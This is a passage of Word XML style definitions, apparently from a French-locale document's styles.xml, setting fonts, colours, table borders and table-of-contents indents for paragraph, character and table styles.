    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Textedebulles"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00374868"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Titredulivre">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="00A934BB"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre5Car">
    <w:name w:val="Titre 5 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003868C2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="0059A1" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="96"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citationauthor">
    <w:name w:val="citationauthor"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00200E5F"/>
  </w:style>
  <w:style w:type="character" w:styleId="lev">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00421168"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Lienhypertextesuivivisit">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00754580"/>
    <w:rPr>
      <w:color w:val="0078D7" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="spellingerror">
    <w:name w:val="spellingerror"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="007F4D4F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="normaltextrun">
    <w:name w:val="normaltextrun"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="007F4D4F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Objetducommentaire">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="Commentaire"/>
    <w:next w:val="Commentaire"/>
    <w:link w:val="ObjetducommentaireCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00972D69"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ObjetducommentaireCar">
    <w:name w:val="Objet du commentaire Car"/>
    <w:basedOn w:val="CommentaireCar"/>
    <w:link w:val="Objetducommentaire"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00972D69"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid0">
    <w:name w:val="Table Grid0"/>
    <w:rsid w:val="002E2BD4"/>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Rvision">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00133B32"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-tab-span">
    <w:name w:val="apple-tab-span"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00133B32"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lgende">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00133B32"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="002050" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="GridTable2-Accent11">
    <w:name w:val="Grid Table 2 - Accent 11"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="47"/>
    <w:rsid w:val="00133B32"/>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customStyle="1" w:styleId="GridTable6Colorful-Accent11">
    <w:name w:val="Grid Table 6 Colorful - Accent 11"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="51"/>
    <w:rsid w:val="00133B32"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0059A1" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="4EB0FF" w:themeColor="accent1" w:themeTint="99"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="4EB0FF" w:themeColor="accent1" w:themeTint="99"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="4EB0FF" w:themeColor="accent1" w:themeTint="99"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="4EB0FF" w:themeColor="accent1" w:themeTint="99"/>
        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="4EB0FF" w:themeColor="accent1" w:themeTint="99"/>
        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="4EB0FF" w:themeColor="accent1" w:themeTint="99"/>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4" w:space="0" w:color="4EB0FF" w:themeColor="accent1" w:themeTint="99"/>
        </w:tcBorders>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table" w:customStyle="1" w:styleId="GridTable6Colorful1">
    <w:name w:val="Grid Table 6 Colorful1"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="51"/>
    <w:rsid w:val="00133B32"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="353535" w:themeColor="text1"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="858585" w:themeColor="text1" w:themeTint="99"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="858585" w:themeColor="text1" w:themeTint="99"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="858585" w:themeColor="text1" w:themeTint="99"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="858585" w:themeColor="text1" w:themeTint="99"/>
        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="858585" w:themeColor="text1" w:themeTint="99"/>
        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="858585" w:themeColor="text1" w:themeTint="99"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="858585" w:themeColor="text1" w:themeTint="99"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:sz="4" w:space="0" w:color="858585" w:themeColor="text1" w:themeTint="99"/>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table" w:customStyle="1" w:styleId="ListTable6Colorful-Accent31">
    <w:name w:val="List Table 6 Colorful - Accent 31"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="51"/>
    <w:rsid w:val="00133B32"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="008CB5" w:themeColor="accent3" w:themeShade="BF"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="00BCF2" w:themeColor="accent3"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="00BCF2" w:themeColor="accent3"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="00BCF2" w:themeColor="accent3"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:sz="4" w:space="0" w:color="00BCF2" w:themeColor="accent3"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C9F3FF" w:themeFill="accent3" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C9F3FF" w:themeFill="accent3" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="ListTable6Colorful1">
    <w:name w:val="List Table 6 Colorful1"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="51"/>
    <w:rsid w:val="00133B32"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="353535" w:themeColor="text1"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="353535" w:themeColor="text1"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="353535" w:themeColor="text1"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="353535" w:themeColor="text1"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:sz="4" w:space="0" w:color="353535" w:themeColor="text1"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D6D6" w:themeFill="text1" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D6D6" w:themeFill="text1" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PrformatHTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PrformatHTMLCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00133B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PrformatHTMLCar">
    <w:name w:val="Préformaté HTML Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="PrformatHTML"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00133B32"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="typ">
    <w:name w:val="typ"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00133B32"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00133B32"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln">
    <w:name w:val="pln"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00133B32"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kwd">
    <w:name w:val="kwd"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00133B32"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="str">
    <w:name w:val="str"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00133B32"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citationintense">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="CitationintenseCar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00133B32"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="10" w:color="0078D7" w:themeColor="accent1"/>
        <w:bottom w:val="single" w:sz="4" w:space="10" w:color="0078D7" w:themeColor="accent1"/>
      </w:pBdr>
      <w:spacing w:before="360" w:after="360"/>
      <w:ind w:left="864" w:right="864"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0078D7" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CitationintenseCar">
    <w:name w:val="Citation intense Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Citationintense"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="00133B32"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0078D7" w:themeColor="accent1"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Normal1">
    <w:name w:val="Normal1"/>
    <w:rsid w:val="00133B32"/>
    <w:rPr>
      <w:rFonts w:ascii="Quattrocento Sans" w:eastAsia="Quattrocento Sans" w:hAnsi="Quattrocento Sans" w:cs="Quattrocento Sans"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList1">
    <w:name w:val="No List1"/>
    <w:next w:val="Aucuneliste"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001E09BB"/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid1">
    <w:name w:val="Table Grid1"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:next w:val="Grilledutableau"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="001E0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0">
    <w:name w:val="Grid Table 1 Light - Accent 110"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:next w:val="GridTable1Light-Accent11"/>
    <w:uiPriority w:val="46"/>
    <w:rsid w:val="001E09BB"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="89CAFF" w:themeColor="accent1" w:themeTint="66"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="89CAFF" w:themeColor="accent1" w:themeTint="66"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="89CAFF" w:themeColor="accent1" w:themeTint="66"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="89CAFF" w:themeColor="accent1" w:themeTint="66"/>
        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="89CAFF" w:themeColor="accent1" w:themeTint="66"/>
        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="89CAFF" w:themeColor="accent1" w:themeTint="66"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4EB0FF" w:themeColor="accent1" w:themeTint="99"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:sz="2" w:space="0" w:color="4EB0FF" w:themeColor="accent1" w:themeTint="99"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="GridTable1Light10">
    <w:name w:val="Grid Table 1 Light10"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:next w:val="GridTable1Light1"/>
    <w:uiPriority w:val="46"/>
    <w:rsid w:val="001E09BB"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="AEAEAE" w:themeColor="text1" w:themeTint="66"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="AEAEAE" w:themeColor="text1" w:themeTint="66"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AEAEAE" w:themeColor="text1" w:themeTint="66"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="AEAEAE" w:themeColor="text1" w:themeTint="66"/>
        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="AEAEAE" w:themeColor="text1" w:themeTint="66"/>
        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="AEAEAE" w:themeColor="text1" w:themeTint="66"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="858585" w:themeColor="text1" w:themeTint="99"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:sz="2" w:space="0" w:color="858585" w:themeColor="text1" w:themeTint="99"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="LightGrid1">
    <w:name w:val="Light Grid1"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:next w:val="Grilleclaire"/>
    <w:uiPriority w:val="62"/>
    <w:rsid w:val="001E09BB"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
        <w:left w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
        <w:bottom w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
        <w:right w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
        <w:insideH w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
        <w:insideV w:val="single" w:sz="8" w:space="0" w:color="353535"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18" w:space="0" w:color="353535" w:themeColor="text1"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="single" w:sz="8" w:space="0" w:color="353535"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53535" w:themeColor="text1"/>
          <w:left w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="single" w:sz="8" w:space="0" w:color="353535"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53535" w:themeColor="text1"/>
          <w:left w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
          <w:left w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="CDCDCD" w:themeFill="text1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1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shd w:val="clear" w:color="auto" w:fill="CDCDCD" w:themeFill="text1" w:themeFillTint="3F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
          <w:left w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
          <w:insideV w:val="single" w:sz="8" w:space="0" w:color="353535" w:themeColor="text1"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid10">
    <w:name w:val="TableGrid1"/>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2">
    <w:name w:val="TableGrid2"/>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table" w:customStyle="1" w:styleId="TableGrid3">
    <w:name w:val="TableGrid3"/>
    <w:rsid w:val="001E09BB"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="ja-JP"/>
    </w:rPr>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Explorateurdedocuments">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="ExplorateurdedocumentsCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001E09BB"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ExplorateurdedocumentsCar">
    <w:name w:val="Explorateur de documents Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Explorateurdedocuments"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001E09BB"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="PlainTable11">
    <w:name w:val="Plain Table 11"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="41"/>
    <w:rsid w:val="00B9796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4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008012BB"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="600"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008012BB"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="800"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008012BB"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="1000"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008012BB"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
